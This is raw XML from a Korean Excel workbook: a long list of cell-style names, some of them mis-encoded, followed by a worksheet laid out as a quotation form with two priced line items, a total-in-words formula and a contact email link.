    <cellStyle name="A_토목내역서_부대초안_중구청일위대가" xfId="1706"/>
    <cellStyle name="A_토목내역서_부대초안_중구청일위대가_관악구청(수정완료)" xfId="1707"/>
    <cellStyle name="A_토목내역서_부대초안_중구청일위대가_중구(담당자요청대로)" xfId="1708"/>
    <cellStyle name="A_토목내역서_부대초안_중구청일위대가_중구청일위대가(0318)" xfId="1709"/>
    <cellStyle name="A_토목내역서_수량산출서" xfId="1710"/>
    <cellStyle name="A_토목내역서_수량산출서_관악구청(수정완료)" xfId="1711"/>
    <cellStyle name="A_토목내역서_수량산출서_중구(담당자요청대로)" xfId="1712"/>
    <cellStyle name="A_토목내역서_수량산출서_중구청일위대가(0318)" xfId="1713"/>
    <cellStyle name="A_토목내역서_중구청일위대가" xfId="1714"/>
    <cellStyle name="A_토목내역서_중구청일위대가_관악구청(수정완료)" xfId="1715"/>
    <cellStyle name="A_토목내역서_중구청일위대가_중구(담당자요청대로)" xfId="1716"/>
    <cellStyle name="A_토목내역서_중구청일위대가_중구청일위대가(0318)" xfId="1717"/>
    <cellStyle name="Aⓒ­" xfId="1718"/>
    <cellStyle name="Ae" xfId="1719"/>
    <cellStyle name="Aee­ " xfId="1720"/>
    <cellStyle name="AeE­ [0]_¼oAI¼º " xfId="1721"/>
    <cellStyle name="ÅëÈ­ [0]_º»¼± ±æ¾î±úºÎ ¼ö·® Áý°èÇ¥ " xfId="1722"/>
    <cellStyle name="AeE­ [0]_º≫¼± ±æ¾i±uºI ¼o·R Ay°eC￥ " xfId="1723"/>
    <cellStyle name="Aee­ _계수대로" xfId="1724"/>
    <cellStyle name="AeE­_¼oAI¼º " xfId="1725"/>
    <cellStyle name="ÅëÈ­_º»¼± ±æ¾î±úºÎ ¼ö·® Áý°èÇ¥ " xfId="1726"/>
    <cellStyle name="AeE­_º≫¼± ±æ¾i±uºI ¼o·R Ay°eC￥ " xfId="1727"/>
    <cellStyle name="Aee¡" xfId="1728"/>
    <cellStyle name="ALIGNMENT" xfId="1729"/>
    <cellStyle name="Aþ¸" xfId="1730"/>
    <cellStyle name="AÞ¸¶ [0]_¼oAI¼º " xfId="1731"/>
    <cellStyle name="ÄÞ¸¶ [0]_º»¼± ±æ¾î±úºÎ ¼ö·® Áý°èÇ¥ " xfId="1732"/>
    <cellStyle name="AÞ¸¶ [0]_º≫¼± ±æ¾i±uºI ¼o·R Ay°eC￥ " xfId="1733"/>
    <cellStyle name="AÞ¸¶_¼oAI¼º " xfId="1734"/>
    <cellStyle name="ÄÞ¸¶_º»¼± ±æ¾î±úºÎ ¼ö·® Áý°èÇ¥ " xfId="1735"/>
    <cellStyle name="AÞ¸¶_º≫¼± ±æ¾i±uºI ¼o·R Ay°eC￥ " xfId="1736"/>
    <cellStyle name="C" xfId="1737"/>
    <cellStyle name="C_도로" xfId="1738"/>
    <cellStyle name="C_부대초안" xfId="1739"/>
    <cellStyle name="C_부대초안_견적의뢰" xfId="1740"/>
    <cellStyle name="C_부대초안_견적의뢰_수량산출서" xfId="1741"/>
    <cellStyle name="C_부대초안_견적의뢰_수량산출서_관악구청(수정완료)" xfId="1742"/>
    <cellStyle name="C_부대초안_견적의뢰_수량산출서_중구(담당자요청대로)" xfId="1743"/>
    <cellStyle name="C_부대초안_견적의뢰_수량산출서_중구청일위대가(0318)" xfId="1744"/>
    <cellStyle name="C_부대초안_견적의뢰_중구청일위대가" xfId="1745"/>
    <cellStyle name="C_부대초안_견적의뢰_중구청일위대가_관악구청(수정완료)" xfId="1746"/>
    <cellStyle name="C_부대초안_견적의뢰_중구청일위대가_중구(담당자요청대로)" xfId="1747"/>
    <cellStyle name="C_부대초안_견적의뢰_중구청일위대가_중구청일위대가(0318)" xfId="1748"/>
    <cellStyle name="C_부대초안_김포투찰" xfId="1749"/>
    <cellStyle name="C_부대초안_김포투찰_견적의뢰" xfId="1750"/>
    <cellStyle name="C_부대초안_김포투찰_견적의뢰_수량산출서" xfId="1751"/>
    <cellStyle name="C_부대초안_김포투찰_견적의뢰_수량산출서_관악구청(수정완료)" xfId="1752"/>
    <cellStyle name="C_부대초안_김포투찰_견적의뢰_수량산출서_중구(담당자요청대로)" xfId="1753"/>
    <cellStyle name="C_부대초안_김포투찰_견적의뢰_수량산출서_중구청일위대가(0318)" xfId="1754"/>
    <cellStyle name="C_부대초안_김포투찰_견적의뢰_중구청일위대가" xfId="1755"/>
    <cellStyle name="C_부대초안_김포투찰_견적의뢰_중구청일위대가_관악구청(수정완료)" xfId="1756"/>
    <cellStyle name="C_부대초안_김포투찰_견적의뢰_중구청일위대가_중구(담당자요청대로)" xfId="1757"/>
    <cellStyle name="C_부대초안_김포투찰_견적의뢰_중구청일위대가_중구청일위대가(0318)" xfId="1758"/>
    <cellStyle name="C_부대초안_수량산출서" xfId="1759"/>
    <cellStyle name="C_부대초안_수량산출서_관악구청(수정완료)" xfId="1760"/>
    <cellStyle name="C_부대초안_수량산출서_중구(담당자요청대로)" xfId="1761"/>
    <cellStyle name="C_부대초안_수량산출서_중구청일위대가(0318)" xfId="1762"/>
    <cellStyle name="C_부대초안_중구청일위대가" xfId="1763"/>
    <cellStyle name="C_부대초안_중구청일위대가_관악구청(수정완료)" xfId="1764"/>
    <cellStyle name="C_부대초안_중구청일위대가_중구(담당자요청대로)" xfId="1765"/>
    <cellStyle name="C_부대초안_중구청일위대가_중구청일위대가(0318)" xfId="1766"/>
    <cellStyle name="C_수량산출서" xfId="1767"/>
    <cellStyle name="C_수량산출서_관악구청(수정완료)" xfId="1768"/>
    <cellStyle name="C_수량산출서_중구(담당자요청대로)" xfId="1769"/>
    <cellStyle name="C_수량산출서_중구청일위대가(0318)" xfId="1770"/>
    <cellStyle name="C_중구청일위대가" xfId="1771"/>
    <cellStyle name="C_중구청일위대가_관악구청(수정완료)" xfId="1772"/>
    <cellStyle name="C_중구청일위대가_중구(담당자요청대로)" xfId="1773"/>
    <cellStyle name="C_중구청일위대가_중구청일위대가(0318)" xfId="1774"/>
    <cellStyle name="C_토목내역서" xfId="1775"/>
    <cellStyle name="C_토목내역서_도로" xfId="1776"/>
    <cellStyle name="C_토목내역서_부대초안" xfId="1777"/>
    <cellStyle name="C_토목내역서_부대초안_견적의뢰" xfId="1778"/>
    <cellStyle name="C_토목내역서_부대초안_견적의뢰_수량산출서" xfId="1779"/>
    <cellStyle name="C_토목내역서_부대초안_견적의뢰_수량산출서_관악구청(수정완료)" xfId="1780"/>
    <cellStyle name="C_토목내역서_부대초안_견적의뢰_수량산출서_중구(담당자요청대로)" xfId="1781"/>
    <cellStyle name="C_토목내역서_부대초안_견적의뢰_수량산출서_중구청일위대가(0318)" xfId="1782"/>
    <cellStyle name="C_토목내역서_부대초안_견적의뢰_중구청일위대가" xfId="1783"/>
    <cellStyle name="C_토목내역서_부대초안_견적의뢰_중구청일위대가_관악구청(수정완료)" xfId="1784"/>
    <cellStyle name="C_토목내역서_부대초안_견적의뢰_중구청일위대가_중구(담당자요청대로)" xfId="1785"/>
    <cellStyle name="C_토목내역서_부대초안_견적의뢰_중구청일위대가_중구청일위대가(0318)" xfId="1786"/>
    <cellStyle name="C_토목내역서_부대초안_김포투찰" xfId="1787"/>
    <cellStyle name="C_토목내역서_부대초안_김포투찰_견적의뢰" xfId="1788"/>
    <cellStyle name="C_토목내역서_부대초안_김포투찰_견적의뢰_수량산출서" xfId="1789"/>
    <cellStyle name="C_토목내역서_부대초안_김포투찰_견적의뢰_수량산출서_관악구청(수정완료)" xfId="1790"/>
    <cellStyle name="C_토목내역서_부대초안_김포투찰_견적의뢰_수량산출서_중구(담당자요청대로)" xfId="1791"/>
    <cellStyle name="C_토목내역서_부대초안_김포투찰_견적의뢰_수량산출서_중구청일위대가(0318)" xfId="1792"/>
    <cellStyle name="C_토목내역서_부대초안_김포투찰_견적의뢰_중구청일위대가" xfId="1793"/>
    <cellStyle name="C_토목내역서_부대초안_김포투찰_견적의뢰_중구청일위대가_관악구청(수정완료)" xfId="1794"/>
    <cellStyle name="C_토목내역서_부대초안_김포투찰_견적의뢰_중구청일위대가_중구(담당자요청대로)" xfId="1795"/>
    <cellStyle name="C_토목내역서_부대초안_김포투찰_견적의뢰_중구청일위대가_중구청일위대가(0318)" xfId="1796"/>
    <cellStyle name="C_토목내역서_부대초안_수량산출서" xfId="1797"/>
    <cellStyle name="C_토목내역서_부대초안_수량산출서_관악구청(수정완료)" xfId="1798"/>
    <cellStyle name="C_토목내역서_부대초안_수량산출서_중구(담당자요청대로)" xfId="1799"/>
    <cellStyle name="C_토목내역서_부대초안_수량산출서_중구청일위대가(0318)" xfId="1800"/>
    <cellStyle name="C_토목내역서_부대초안_중구청일위대가" xfId="1801"/>
    <cellStyle name="C_토목내역서_부대초안_중구청일위대가_관악구청(수정완료)" xfId="1802"/>
    <cellStyle name="C_토목내역서_부대초안_중구청일위대가_중구(담당자요청대로)" xfId="1803"/>
    <cellStyle name="C_토목내역서_부대초안_중구청일위대가_중구청일위대가(0318)" xfId="1804"/>
    <cellStyle name="C_토목내역서_수량산출서" xfId="1805"/>
    <cellStyle name="C_토목내역서_수량산출서_관악구청(수정완료)" xfId="1806"/>
    <cellStyle name="C_토목내역서_수량산출서_중구(담당자요청대로)" xfId="1807"/>
    <cellStyle name="C_토목내역서_수량산출서_중구청일위대가(0318)" xfId="1808"/>
    <cellStyle name="C_토목내역서_중구청일위대가" xfId="1809"/>
    <cellStyle name="C_토목내역서_중구청일위대가_관악구청(수정완료)" xfId="1810"/>
    <cellStyle name="C_토목내역서_중구청일위대가_중구(담당자요청대로)" xfId="1811"/>
    <cellStyle name="C_토목내역서_중구청일위대가_중구청일위대가(0318)" xfId="1812"/>
    <cellStyle name="C￥AØ_  FAB AIA¤  " xfId="1813"/>
    <cellStyle name="Ç¥ÁØ_ÀÏÀ§´ë°¡ (2)" xfId="1814"/>
    <cellStyle name="Calc Currency (0)" xfId="1815"/>
    <cellStyle name="category" xfId="1816"/>
    <cellStyle name="ⓒo" xfId="1817"/>
    <cellStyle name="Comm뼬_E&amp;ONW2" xfId="1818"/>
    <cellStyle name="Comma" xfId="1819"/>
    <cellStyle name="Comma [0]" xfId="1820"/>
    <cellStyle name="comma zerodec" xfId="1821"/>
    <cellStyle name="Comma_ SG&amp;A Bridge " xfId="1822"/>
    <cellStyle name="Comma0" xfId="1823"/>
    <cellStyle name="Copied" xfId="1824"/>
    <cellStyle name="Curren?_x0012_퐀_x0017_?" xfId="1825"/>
    <cellStyle name="Currency" xfId="1826"/>
    <cellStyle name="Currency [0]" xfId="1827"/>
    <cellStyle name="Currency_ SG&amp;A Bridge " xfId="1828"/>
    <cellStyle name="Currency0" xfId="1829"/>
    <cellStyle name="Currency1" xfId="1830"/>
    <cellStyle name="Date" xfId="1831"/>
    <cellStyle name="Dezimal [0]_Compiling Utility Macros" xfId="1832"/>
    <cellStyle name="Dezimal_Compiling Utility Macros" xfId="1833"/>
    <cellStyle name="Dollar (zero dec)" xfId="1834"/>
    <cellStyle name="Entered" xfId="1835"/>
    <cellStyle name="F2" xfId="1836"/>
    <cellStyle name="F3" xfId="1837"/>
    <cellStyle name="F4" xfId="1838"/>
    <cellStyle name="F5" xfId="1839"/>
    <cellStyle name="F6" xfId="1840"/>
    <cellStyle name="F7" xfId="1841"/>
    <cellStyle name="F8" xfId="1842"/>
    <cellStyle name="Fixed" xfId="1843"/>
    <cellStyle name="Followed Hyperlink" xfId="1844"/>
    <cellStyle name="Grey" xfId="1845"/>
    <cellStyle name="H1" xfId="1846"/>
    <cellStyle name="H2" xfId="1847"/>
    <cellStyle name="HEADER" xfId="1848"/>
    <cellStyle name="Header1" xfId="1849"/>
    <cellStyle name="Header2" xfId="1850"/>
    <cellStyle name="Heading 1" xfId="1851"/>
    <cellStyle name="Heading 2" xfId="1852"/>
    <cellStyle name="Heading1" xfId="1853"/>
    <cellStyle name="Heading2" xfId="1854"/>
    <cellStyle name="Hyperlink" xfId="1855"/>
    <cellStyle name="Input [yellow]" xfId="1856"/>
    <cellStyle name="kg" xfId="1857"/>
    <cellStyle name="loo" xfId="1858"/>
    <cellStyle name="M" xfId="1859"/>
    <cellStyle name="M2" xfId="1860"/>
    <cellStyle name="M3" xfId="1861"/>
    <cellStyle name="Milliers [0]_Arabian Spec" xfId="1862"/>
    <cellStyle name="Milliers_Arabian Spec" xfId="1863"/>
    <cellStyle name="Model" xfId="1864"/>
    <cellStyle name="Mon?aire [0]_Arabian Spec" xfId="1865"/>
    <cellStyle name="Mon?aire_Arabian Spec" xfId="1866"/>
    <cellStyle name="no dec" xfId="1867"/>
    <cellStyle name="Normal - Style1" xfId="1868"/>
    <cellStyle name="Normal - Style2" xfId="1869"/>
    <cellStyle name="Normal - Style3" xfId="1870"/>
    <cellStyle name="Normal - Style4" xfId="1871"/>
    <cellStyle name="Normal - Style5" xfId="1872"/>
    <cellStyle name="Normal - Style6" xfId="1873"/>
    <cellStyle name="Normal - Style7" xfId="1874"/>
    <cellStyle name="Normal - Style8" xfId="1875"/>
    <cellStyle name="Normal_ SG&amp;A Bridge " xfId="1876"/>
    <cellStyle name="Œ…?æ맖?e [0.00]_laroux" xfId="1877"/>
    <cellStyle name="Œ…?æ맖?e_laroux" xfId="1878"/>
    <cellStyle name="oft Excel]&#13;&#10;Comment=The open=/f lines load custom functions into the Paste Function list.&#13;&#10;Maximized=3&#13;&#10;AutoFormat=" xfId="1879"/>
    <cellStyle name="oh" xfId="1880"/>
    <cellStyle name="Percent" xfId="1881"/>
    <cellStyle name="Percent [2]" xfId="1882"/>
    <cellStyle name="Percent_가로수(벚나무)생육환경개선공사" xfId="1883"/>
    <cellStyle name="RevList" xfId="1884"/>
    <cellStyle name="sh" xfId="1885"/>
    <cellStyle name="ssh" xfId="1886"/>
    <cellStyle name="Standard_Anpassen der Amortisation" xfId="1887"/>
    <cellStyle name="subhead" xfId="1888"/>
    <cellStyle name="Subtotal" xfId="1889"/>
    <cellStyle name="title [1]" xfId="1890"/>
    <cellStyle name="title [2]" xfId="1891"/>
    <cellStyle name="Total" xfId="1892"/>
    <cellStyle name="UM" xfId="1893"/>
    <cellStyle name="W?rung [0]_Compiling Utility Macros" xfId="1894"/>
    <cellStyle name="W?rung_Compiling Utility Macros" xfId="18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8</xdr:row>
      <xdr:rowOff>190500</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>7</xdr:col>
      <xdr:colOff>28575</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>95250</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="1" name="그림 1" descr="도장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41935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nsung3434@hanmail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8.88671875" defaultRowHeight="13.5"/>
  <cols>
    <col min="1" max="1" width="6.6640625" style="32" customWidth="1"/>
    <col min="2" max="2" width="14.99609375" style="32" customWidth="1"/>
    <col min="3" max="3" width="18.3359375" style="32" customWidth="1"/>
    <col min="4" max="4" width="5.3359375" style="32" customWidth="1"/>
    <col min="5" max="5" width="7.77734375" style="32" customWidth="1"/>
    <col min="6" max="6" width="11.10546875" style="32" customWidth="1"/>
    <col min="7" max="7" width="13.6640625" style="32" customWidth="1"/>
    <col min="8" max="8" width="10.21484375" style="32" customWidth="1"/>
    <col min="9" max="16384" width="8.88671875" style="3" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="13.5">
      <c r="A1" s="66"/>
      <c r="B1" s="66"/>
      <c r="C1" s="66"/>
      <c r="D1" s="66"/>
      <c r="E1" s="66"/>
      <c r="F1" s="66"/>
      <c r="G1" s="66"/>
      <c r="H1" s="66"/>
    </row>
    <row r="2" ht="38.25" customHeight="1"/>
    <row r="3" spans="1:8" s="7" customFormat="1" ht="31.5">
      <c r="A3" s="79" t="s">
        <v>18</v>
      </c>
      <c r="B3" s="79"/>
      <c r="C3" s="79"/>
      <c r="D3" s="79"/>
      <c r="E3" s="79"/>
      <c r="F3" s="79"/>
      <c r="G3" s="79"/>
      <c r="H3" s="79"/>
    </row>
    <row r="4" spans="1:8" ht="21" customHeight="1">
      <c r="A4" s="84" t="s">
        <v>1</v>
      </c>
      <c r="B4" s="84"/>
      <c r="C4" s="84"/>
      <c r="D4" s="84"/>
      <c r="E4" s="84"/>
      <c r="F4" s="84"/>
      <c r="G4" s="84"/>
      <c r="H4" s="84"/>
    </row>
    <row r="5" spans="1:8" ht="21" customHeight="1">
      <c r="A5" s="9"/>
      <c r="B5" s="9"/>
      <c r="C5" s="9"/>
      <c r="D5" s="9"/>
      <c r="E5" s="10"/>
      <c r="F5" s="9"/>
      <c r="G5" s="9"/>
      <c r="H5" s="9"/>
    </row>
    <row r="6" spans="1:8" ht="18.75" customHeight="1">
      <c r="A6" s="11"/>
      <c r="B6" s="11"/>
      <c r="C6" s="11"/>
      <c r="D6" s="12"/>
      <c r="E6" s="80" t="s">
        <v>42</v>
      </c>
      <c r="F6" s="81"/>
      <c r="G6" s="81"/>
      <c r="H6" s="81"/>
    </row>
    <row r="7" spans="1:8" ht="15.75" customHeight="1">
      <c r="A7" s="32" t="s">
        <v>21</v>
      </c>
      <c r="B7" s="31"/>
      <c r="C7" s="13"/>
      <c r="D7" s="12"/>
      <c r="E7" s="82" t="s">
        <v>41</v>
      </c>
      <c r="F7" s="83"/>
      <c r="G7" s="83"/>
      <c r="H7" s="83"/>
    </row>
    <row r="8" spans="1:8" ht="15.75" customHeight="1">
      <c r="A8" s="76" t="s">
        <v>50</v>
      </c>
      <c r="B8" s="76"/>
      <c r="C8" s="76"/>
      <c r="D8" s="12"/>
      <c r="E8" s="83" t="s">
        <v>39</v>
      </c>
      <c r="F8" s="83"/>
      <c r="G8" s="83"/>
      <c r="H8" s="83"/>
    </row>
    <row r="9" spans="1:8" ht="15.75" customHeight="1">
      <c r="A9" s="32" t="s">
        <v>20</v>
      </c>
      <c r="B9" s="31" t="s">
        <v>49</v>
      </c>
      <c r="C9" s="14"/>
      <c r="D9" s="14"/>
      <c r="E9" s="83" t="s">
        <v>40</v>
      </c>
      <c r="F9" s="83"/>
      <c r="G9" s="83"/>
      <c r="H9" s="83"/>
    </row>
    <row r="10" spans="5:8" ht="17.25" customHeight="1">
      <c r="E10" s="83" t="s">
        <v>51</v>
      </c>
      <c r="F10" s="83"/>
      <c r="G10" s="83"/>
      <c r="H10" s="83"/>
    </row>
    <row r="11" spans="1:8" s="5" customFormat="1" ht="26.25" customHeight="1">
      <c r="A11" s="31" t="s">
        <v>37</v>
      </c>
      <c r="B11" s="32"/>
      <c r="C11" s="15"/>
      <c r="D11" s="15"/>
      <c r="E11" s="83"/>
      <c r="F11" s="83"/>
      <c r="G11" s="83"/>
      <c r="H11" s="83"/>
    </row>
    <row r="12" spans="1:8" s="4" customFormat="1" ht="26.25" customHeight="1">
      <c r="A12" s="12" t="s">
        <v>19</v>
      </c>
      <c r="B12" s="12" t="str">
        <f>"일금"&amp;TEXT(F12,"[dbnum4]g/표준")&amp;"원정"</f>
        <v>일금영원정</v>
      </c>
      <c r="C12" s="12"/>
      <c r="D12" s="12"/>
      <c r="E12" s="42" t="s">
        <v>22</v>
      </c>
      <c r="F12" s="73">
        <f>G18</f>
        <v>0</v>
      </c>
      <c r="G12" s="73"/>
      <c r="H12" s="12"/>
    </row>
    <row r="13" spans="1:8" ht="7.5" customHeight="1" thickBot="1">
      <c r="A13" s="16"/>
      <c r="B13" s="16"/>
      <c r="E13" s="16"/>
      <c r="F13" s="16"/>
      <c r="G13" s="16"/>
      <c r="H13" s="16"/>
    </row>
    <row r="14" spans="1:8" s="6" customFormat="1" ht="21.75" customHeight="1" thickTop="1">
      <c r="A14" s="67" t="s">
        <v>2</v>
      </c>
      <c r="B14" s="68"/>
      <c r="C14" s="33" t="s">
        <v>3</v>
      </c>
      <c r="D14" s="33" t="s">
        <v>4</v>
      </c>
      <c r="E14" s="33" t="s">
        <v>5</v>
      </c>
      <c r="F14" s="33" t="s">
        <v>6</v>
      </c>
      <c r="G14" s="33" t="s">
        <v>7</v>
      </c>
      <c r="H14" s="34" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="15" spans="1:8" ht="18" customHeight="1">
      <c r="A15" s="69" t="s">
        <v>0</v>
      </c>
      <c r="B15" s="70"/>
      <c r="C15" s="17" t="s">
        <v>9</v>
      </c>
      <c r="D15" s="17" t="s">
        <v>10</v>
      </c>
      <c r="E15" s="17" t="s">
        <v>11</v>
      </c>
      <c r="F15" s="17" t="s">
        <v>12</v>
      </c>
      <c r="G15" s="17" t="s">
        <v>13</v>
      </c>
      <c r="H15" s="18" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="16" spans="1:11" s="2" customFormat="1" ht="19.5" customHeight="1">
      <c r="A16" s="71" t="s">
        <v>43</v>
      </c>
      <c r="B16" s="72"/>
      <c r="C16" s="24" t="s">
        <v>44</v>
      </c>
      <c r="D16" s="24" t="s">
        <v>45</v>
      </c>
      <c r="E16" s="24">
        <v>1</v>
      </c>
      <c r="F16" s="25">
        <v>220000</v>
      </c>
      <c r="G16" s="25">
        <f>F16*E16</f>
        <v>220000</v>
      </c>
      <c r="H16" s="27"/>
      <c r="I16" s="57"/>
      <c r="J16" s="58"/>
      <c r="K16" s="59"/>
    </row>
    <row r="17" spans="1:8" s="2" customFormat="1" ht="19.5" customHeight="1">
      <c r="A17" s="74" t="s">
        <v>46</v>
      </c>
      <c r="B17" s="75"/>
      <c r="C17" s="24" t="s">
        <v>47</v>
      </c>
      <c r="D17" s="24" t="s">
        <v>45</v>
      </c>
      <c r="E17" s="24">
        <v>1</v>
      </c>
      <c r="F17" s="21">
        <v>105000</v>
      </c>
      <c r="G17" s="25">
        <f>F17*E17</f>
        <v>105000</v>
      </c>
      <c r="H17" s="28"/>
    </row>
    <row r="18" spans="1:8" s="2" customFormat="1" ht="19.5" customHeight="1">
      <c r="A18" s="64"/>
      <c r="B18" s="65"/>
      <c r="C18" s="43"/>
      <c r="D18" s="43"/>
      <c r="E18" s="43"/>
      <c r="F18" s="43"/>
      <c r="G18" s="60"/>
      <c r="H18" s="41"/>
    </row>
    <row r="19" spans="1:8" s="2" customFormat="1" ht="19.5" customHeight="1">
      <c r="A19" s="64"/>
      <c r="B19" s="65"/>
      <c r="C19" s="24"/>
      <c r="D19" s="24"/>
      <c r="E19" s="24"/>
      <c r="F19" s="21"/>
      <c r="G19" s="21"/>
      <c r="H19" s="28"/>
    </row>
    <row r="20" spans="1:8" s="2" customFormat="1" ht="19.5" customHeight="1">
      <c r="A20" s="64"/>
      <c r="B20" s="65"/>
      <c r="C20" s="24"/>
      <c r="D20" s="24"/>
      <c r="E20" s="24"/>
      <c r="F20" s="21"/>
      <c r="G20" s="21"/>
      <c r="H20" s="29"/>
    </row>
    <row r="21" spans="1:8" s="2" customFormat="1" ht="19.5" customHeight="1">
      <c r="A21" s="64"/>
      <c r="B21" s="65"/>
      <c r="C21" s="24"/>
      <c r="D21" s="24"/>
      <c r="E21" s="24"/>
      <c r="F21" s="21"/>
      <c r="G21" s="21"/>
      <c r="H21" s="29"/>
    </row>
    <row r="22" spans="1:8" s="2" customFormat="1" ht="19.5" customHeight="1">
      <c r="A22" s="64"/>
      <c r="B22" s="65"/>
      <c r="C22" s="24"/>
      <c r="D22" s="24"/>
      <c r="E22" s="24"/>
      <c r="F22" s="21"/>
      <c r="G22" s="21"/>
      <c r="H22" s="29"/>
    </row>
    <row r="23" spans="1:8" s="2" customFormat="1" ht="19.5" customHeight="1">
      <c r="A23" s="62"/>
      <c r="B23" s="63"/>
      <c r="C23" s="24"/>
      <c r="D23" s="24"/>
      <c r="E23" s="24"/>
      <c r="F23" s="21"/>
      <c r="G23" s="21"/>
      <c r="H23" s="29"/>
    </row>
    <row r="24" spans="1:8" s="2" customFormat="1" ht="19.5" customHeight="1">
      <c r="A24" s="62"/>
      <c r="B24" s="63"/>
      <c r="C24" s="24"/>
      <c r="D24" s="24"/>
      <c r="E24" s="24"/>
      <c r="F24" s="21"/>
      <c r="G24" s="21"/>
      <c r="H24" s="29"/>
    </row>
    <row r="25" spans="1:8" s="2" customFormat="1" ht="19.5" customHeight="1">
      <c r="A25" s="62"/>
      <c r="B25" s="63"/>
      <c r="C25" s="24"/>
      <c r="D25" s="24"/>
      <c r="E25" s="24"/>
      <c r="F25" s="21"/>
      <c r="G25" s="21"/>
      <c r="H25" s="29"/>
    </row>
    <row r="26" spans="1:8" s="2" customFormat="1" ht="19.5" customHeight="1">
      <c r="A26" s="62"/>
      <c r="B26" s="63"/>
      <c r="C26" s="24"/>
      <c r="D26" s="24"/>
      <c r="E26" s="24"/>
      <c r="F26" s="21"/>
      <c r="G26" s="21"/>
      <c r="H26" s="29"/>
    </row>
    <row r="27" spans="1:8" s="2" customFormat="1" ht="19.5" customHeight="1">
      <c r="A27" s="62"/>
      <c r="B27" s="63"/>
      <c r="C27" s="24"/>
      <c r="D27" s="24"/>
      <c r="E27" s="24"/>
      <c r="F27" s="21"/>
      <c r="G27" s="21"/>
      <c r="H27" s="29"/>
    </row>
    <row r="28" spans="1:8" s="2" customFormat="1" ht="19.5" customHeight="1">
      <c r="A28" s="62"/>
      <c r="B28" s="63"/>
      <c r="C28" s="24"/>
      <c r="D28" s="24"/>
      <c r="E28" s="24"/>
      <c r="F28" s="21"/>
      <c r="G28" s="21"/>
      <c r="H28" s="29"/>
    </row>
    <row r="29" spans="1:8" s="2" customFormat="1" ht="19.5" customHeight="1">
      <c r="A29" s="62"/>
      <c r="B29" s="63"/>
      <c r="C29" s="24"/>
      <c r="D29" s="24"/>
      <c r="E29" s="24"/>
      <c r="F29" s="21"/>
      <c r="G29" s="21"/>
      <c r="H29" s="28"/>
    </row>
    <row r="30" spans="1:8" s="2" customFormat="1" ht="19.5" customHeight="1">
      <c r="A30" s="62"/>
      <c r="B30" s="63"/>
      <c r="C30" s="22"/>
      <c r="D30" s="22"/>
      <c r="E30" s="22"/>
      <c r="F30" s="23"/>
      <c r="G30" s="26"/>
      <c r="H30" s="30"/>
    </row>
    <row r="31" spans="1:8" s="8" customFormat="1" ht="26.25" customHeight="1">
      <c r="A31" s="35" t="s">
        <v>15</v>
      </c>
      <c r="B31" s="35"/>
      <c r="C31" s="19"/>
      <c r="D31" s="19"/>
      <c r="E31" s="19"/>
      <c r="F31" s="19"/>
      <c r="G31" s="19"/>
      <c r="H31" s="19"/>
    </row>
    <row r="32" spans="1:8" s="38" customFormat="1" ht="23.25" customHeight="1">
      <c r="A32" s="61" t="s">
        <v>48</v>
      </c>
      <c r="B32" s="1"/>
      <c r="C32" s="20"/>
      <c r="D32" s="37"/>
      <c r="E32" s="37"/>
      <c r="F32" s="37"/>
      <c r="G32" s="37"/>
      <c r="H32" s="37"/>
    </row>
    <row r="33" spans="1:8" s="38" customFormat="1" ht="23.25" customHeight="1">
      <c r="A33" s="77" t="s">
        <v>23</v>
      </c>
      <c r="B33" s="78"/>
      <c r="C33" s="78"/>
      <c r="D33" s="36"/>
      <c r="E33" s="37"/>
      <c r="F33" s="37"/>
      <c r="G33" s="37"/>
      <c r="H33" s="37"/>
    </row>
    <row r="34" spans="1:8" s="38" customFormat="1" ht="23.25" customHeight="1">
      <c r="A34" s="61" t="s">
        <v>38</v>
      </c>
      <c r="B34" s="1"/>
      <c r="C34" s="20"/>
      <c r="D34" s="37"/>
      <c r="E34" s="37"/>
      <c r="F34" s="37"/>
      <c r="G34" s="37"/>
      <c r="H34" s="37"/>
    </row>
    <row r="35" spans="1:8" s="38" customFormat="1" ht="23.25" customHeight="1">
      <c r="A35" s="1" t="s">
        <v>16</v>
      </c>
      <c r="B35" s="1"/>
      <c r="C35" s="20"/>
      <c r="D35" s="37"/>
      <c r="E35" s="37"/>
      <c r="F35" s="37"/>
      <c r="G35" s="37"/>
      <c r="H35" s="37"/>
    </row>
    <row r="36" spans="1:8" s="38" customFormat="1" ht="2.25" customHeight="1" thickBot="1">
      <c r="A36" s="39"/>
      <c r="B36" s="39"/>
      <c r="C36" s="40"/>
      <c r="D36" s="40"/>
      <c r="E36" s="40"/>
      <c r="F36" s="40"/>
      <c r="G36" s="40"/>
      <c r="H36" s="40"/>
    </row>
    <row r="37" spans="1:8" s="8" customFormat="1" ht="13.5" customHeight="1" thickTop="1">
      <c r="A37" s="1" t="s">
        <v>17</v>
      </c>
      <c r="B37" s="1"/>
      <c r="C37" s="20"/>
      <c r="D37" s="20"/>
      <c r="E37" s="20"/>
      <c r="F37" s="20"/>
      <c r="G37" s="20"/>
      <c r="H37" s="20"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="28">
    <mergeCell ref="A33:C33"/>
    <mergeCell ref="A3:H3"/>
    <mergeCell ref="E6:H6"/>
    <mergeCell ref="E7:H7"/>
    <mergeCell ref="E8:H8"/>
    <mergeCell ref="E9:H9"/>
    <mergeCell ref="A4:H4"/>
    <mergeCell ref="A22:B22"/>
    <mergeCell ref="E10:H11"/>
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="A14:B14"/>
    <mergeCell ref="A15:B15"/>
    <mergeCell ref="A16:B16"/>
    <mergeCell ref="F12:G12"/>
    <mergeCell ref="A17:B17"/>
    <mergeCell ref="A8:C8"/>
    <mergeCell ref="A18:B18"/>
    <mergeCell ref="A19:B19"/>
    <mergeCell ref="A20:B20"/>
    <mergeCell ref="A21:B21"/>
    <mergeCell ref="A23:B23"/>
    <mergeCell ref="A24:B24"/>
    <mergeCell ref="A29:B29"/>
    <mergeCell ref="A30:B30"/>
    <mergeCell ref="A25:B25"/>
    <mergeCell ref="A26:B26"/>
    <mergeCell ref="A27:B27"/>
    <mergeCell ref="A28:B28"/>
  </mergeCells>
  <hyperlinks>
    <hyperlink ref="E7" r:id="rId1" display="jinsung3434@hanmail.net"/>
